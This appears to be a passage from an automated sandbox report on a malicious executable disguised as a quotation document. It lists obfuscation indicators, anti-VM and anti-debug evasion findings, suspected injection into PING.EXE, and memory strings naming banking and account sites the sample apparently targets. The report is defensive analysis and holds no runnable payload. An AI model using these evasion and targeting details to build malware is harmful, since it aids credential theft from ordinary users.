            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, yWtnRxT5Mv2k8WufJX.csHigh entropy of concatenated method names: 'PPBMC7nPwx', 'P1QMo0Ju6Z', 'ESqMkTvtxs', 'dYNMSJFRvU', 'hObMEKMc4E', 'zBHMX5vdus', 'ppRMY6HiIj', 'M67erhdr9x', 'UlPe4FU7RU', 'dOhe7xbNQn'
            Source: 0.2.Quotation-27-08-24.exe.4a4ea60.6.raw.unpack, fTHmXrkWA2bYu5qWfc.csHigh entropy of concatenated method names: 'fQ5CvwT4tW', 'yadCwbjQJA', 'ygOC3o1V5k', 'UIjCqOmSvF', 'L7LCJdeRyB', 'VYeCKdE919', 'BiVfpIGHYJDEBiMZUg', 'raiAfUDRBO44OjmNDx', 'Q6OCCW8MIs', 'pG8Coy61dQ'
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Quotation-27-08-24.exe PID: 3880, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\PING.EXEAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 2CF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 77D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 87D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 8970000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 6F50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 9B40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: 77D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA096E rdtsc 4_2_00FA096E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEWindow / User API: threadDelayed 9837Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\PING.EXEAPI coverage: 2.4 %
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exe TID: 6720Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884Thread sleep count: 40 > 30Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe TID: 2884Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528Thread sleep count: 9837 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXE TID: 2528Thread sleep time: -19674000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\PING.EXECode function: 9_2_0048C010 FindFirstFileW,FindNextFileW,FindClose,9_2_0048C010
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: Z426iIL7.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Z426iIL7.9.drBinary or memory string: discord.comVMware20,11696487552f
            Source: Z426iIL7.9.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Z426iIL7.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: Z426iIL7.9.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: global block list test formVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: Z426iIL7.9.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: uExImirYECsTjI.exe, 00000008.00000002.4565784664.000000000082E000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 00000009.00000002.4566598381.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2756714639.000002C3BF3EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Z426iIL7.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: Z426iIL7.9.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Z426iIL7.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Z426iIL7.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: Z426iIL7.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: Z426iIL7.9.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Z426iIL7.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: Quotation-27-08-24.exe, 00000000.00000002.2132326848.0000000009AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: ao5Z9vmCIX
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Z426iIL7.9.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: Z426iIL7.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: Z426iIL7.9.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: Z426iIL7.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: Z426iIL7.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: Z426iIL7.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA096E rdtsc 4_2_00FA096E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00417583 LdrLoadDll,4_2_00417583
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C0F0 mov eax, dword ptr fs:[00000030h]4_2_00F5C0F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA20F0 mov ecx, dword ptr fs:[00000030h]4_2_00FA20F0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov ecx, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov ecx, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov ecx, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov eax, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100E10E mov ecx, dword ptr fs:[00000030h]4_2_0100E10E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A0E3 mov ecx, dword ptr fs:[00000030h]4_2_00F5A0E3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01020115 mov eax, dword ptr fs:[00000030h]4_2_01020115
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100A118 mov ecx, dword ptr fs:[00000030h]4_2_0100A118
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100A118 mov eax, dword ptr fs:[00000030h]4_2_0100A118
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100A118 mov eax, dword ptr fs:[00000030h]4_2_0100A118
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100A118 mov eax, dword ptr fs:[00000030h]4_2_0100A118
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE60E0 mov eax, dword ptr fs:[00000030h]4_2_00FE60E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F680E9 mov eax, dword ptr fs:[00000030h]4_2_00F680E9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE20DE mov eax, dword ptr fs:[00000030h]4_2_00FE20DE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF80A8 mov eax, dword ptr fs:[00000030h]4_2_00FF80A8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6208A mov eax, dword ptr fs:[00000030h]4_2_00F6208A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01004180 mov eax, dword ptr fs:[00000030h]4_2_01004180
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01004180 mov eax, dword ptr fs:[00000030h]4_2_01004180
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101C188 mov eax, dword ptr fs:[00000030h]4_2_0101C188
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101C188 mov eax, dword ptr fs:[00000030h]4_2_0101C188
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8C073 mov eax, dword ptr fs:[00000030h]4_2_00F8C073
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F62050 mov eax, dword ptr fs:[00000030h]4_2_00F62050
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE6050 mov eax, dword ptr fs:[00000030h]4_2_00FE6050
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010261C3 mov eax, dword ptr fs:[00000030h]4_2_010261C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010261C3 mov eax, dword ptr fs:[00000030h]4_2_010261C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6030 mov eax, dword ptr fs:[00000030h]4_2_00FF6030
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A020 mov eax, dword ptr fs:[00000030h]4_2_00F5A020
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C020 mov eax, dword ptr fs:[00000030h]4_2_00F5C020
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E016 mov eax, dword ptr fs:[00000030h]4_2_00F7E016
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E016 mov eax, dword ptr fs:[00000030h]4_2_00F7E016
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E016 mov eax, dword ptr fs:[00000030h]4_2_00F7E016
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F7E016 mov eax, dword ptr fs:[00000030h]4_2_00F7E016
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010361E5 mov eax, dword ptr fs:[00000030h]4_2_010361E5
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE4000 mov ecx, dword ptr fs:[00000030h]4_2_00FE4000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01002000 mov eax, dword ptr fs:[00000030h]4_2_01002000
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F901F8 mov eax, dword ptr fs:[00000030h]4_2_00F901F8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]4_2_00FDE1D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]4_2_00FDE1D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE1D0 mov ecx, dword ptr fs:[00000030h]4_2_00FDE1D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]4_2_00FDE1D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE1D0 mov eax, dword ptr fs:[00000030h]4_2_00FDE1D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE019F mov eax, dword ptr fs:[00000030h]4_2_00FE019F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE019F mov eax, dword ptr fs:[00000030h]4_2_00FE019F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE019F mov eax, dword ptr fs:[00000030h]4_2_00FE019F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE019F mov eax, dword ptr fs:[00000030h]4_2_00FE019F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A197 mov eax, dword ptr fs:[00000030h]4_2_00F5A197
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A197 mov eax, dword ptr fs:[00000030h]4_2_00F5A197
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A197 mov eax, dword ptr fs:[00000030h]4_2_00F5A197
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA0185 mov eax, dword ptr fs:[00000030h]4_2_00FA0185
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66154 mov eax, dword ptr fs:[00000030h]4_2_00F66154
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66154 mov eax, dword ptr fs:[00000030h]4_2_00F66154
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5C156 mov eax, dword ptr fs:[00000030h]4_2_00F5C156
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF8158 mov eax, dword ptr fs:[00000030h]4_2_00FF8158
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010260B8 mov eax, dword ptr fs:[00000030h]4_2_010260B8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_010260B8 mov ecx, dword ptr fs:[00000030h]4_2_010260B8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov ecx, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF4144 mov eax, dword ptr fs:[00000030h]4_2_00FF4144
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F90124 mov eax, dword ptr fs:[00000030h]4_2_00F90124
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F702E1 mov eax, dword ptr fs:[00000030h]4_2_00F702E1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A2C3 mov eax, dword ptr fs:[00000030h]4_2_00F6A2C3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102A352 mov eax, dword ptr fs:[00000030h]4_2_0102A352
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01008350 mov ecx, dword ptr fs:[00000030h]4_2_01008350
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov ecx, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF62A0 mov eax, dword ptr fs:[00000030h]4_2_00FF62A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100437C mov eax, dword ptr fs:[00000030h]4_2_0100437C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0283 mov eax, dword ptr fs:[00000030h]4_2_00FE0283
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E284 mov eax, dword ptr fs:[00000030h]4_2_00F9E284
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9E284 mov eax, dword ptr fs:[00000030h]4_2_00F9E284
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64260 mov eax, dword ptr fs:[00000030h]4_2_00F64260
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5826B mov eax, dword ptr fs:[00000030h]4_2_00F5826B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5A250 mov eax, dword ptr fs:[00000030h]4_2_00F5A250
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66259 mov eax, dword ptr fs:[00000030h]4_2_00F66259
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE8243 mov eax, dword ptr fs:[00000030h]4_2_00FE8243
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE8243 mov ecx, dword ptr fs:[00000030h]4_2_00FE8243
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0101C3CD mov eax, dword ptr fs:[00000030h]4_2_0101C3CD
